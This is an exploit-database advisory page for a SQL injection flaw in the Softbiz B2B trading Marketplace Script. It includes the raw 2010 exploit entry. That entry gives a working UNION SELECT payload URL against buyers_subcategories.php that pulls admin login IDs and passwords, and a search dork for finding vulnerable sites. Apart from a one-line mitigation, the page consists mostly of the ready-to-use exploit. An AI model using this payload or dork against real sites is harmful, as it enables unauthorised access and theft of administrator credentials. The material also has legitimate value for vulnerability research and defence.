Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability

vendor:

Softbiz B2B trading Marketplace Script

by:

AnGrY BoY

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Softbiz B2B trading Marketplace Script

Affected Version From: Softbiz B2B trading Marketplace Script

Affected Version To: Softbiz B2B trading Marketplace Script

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2

2010

Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability

Softbiz B2B trading Marketplace Script is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the buyers_subcategories.php page with the IndustryID parameter. For example, http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin-- can be used to extract sensitive information from the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability
# Date   :15/4/2010
# Author : AnGrY BoY
# Contact: h4kurd@hotmail.com & h4kurd@yahoo.com
# Home   : http://www.kurd-security.com
# Software Link : N/A
# Version : Softbiz B2B trading Marketplace Script
# Tested on : windows SP2
# CVE : 0
# Dork     : buyers_subcategories.php?IndustryID=
 
 
 
# expolit:


# http://localhost/path/buyers_subcategories.php?IndustryID=[SQL]
			
# http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--
 
=============================================
# Gre3tZ :- all kurd-security members